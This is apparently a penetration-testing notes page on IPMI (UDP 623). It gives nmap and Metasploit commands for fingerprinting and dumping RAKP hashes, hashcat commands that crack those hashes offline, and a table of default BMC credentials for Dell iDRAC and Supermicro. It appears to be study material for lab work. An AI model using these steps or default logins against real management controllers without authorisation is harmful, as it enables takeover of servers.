IPMI (623)

Footprinting using NMAP

sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local

Metasploit version scan

use auxiliary/scanner/ipmi/ipmi_version

Flaw in RAKP protocol in IPMI 2.0

  • the server will send an MD5/SHA1 (salted) to the client which can be cracked offline Cracking using hashcat (HP iLO default password)

hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

Cracking using hashcat (input wordlist)

hashcat -m 7300 ipmi.txt /usr/share/wordlists/rockyou.txt

Metasploit dumping hashes

use auxiliary/scanner/ipmi/ipmi_dumphashes

After cracking, we can now login to the baseboard management controller (BMC)

Notes:

port 623 (UDP)

Default passwords

Product

Username

Password

Dell iDRAC

root

calvin

HP iLO

Administrator

randomized 8-character string consisting of numbers and uppercase letters

Supermicro IPMI

ADMIN

ADMIN

PreviousOracle TNS (1521)NextFTP (21)

Last updated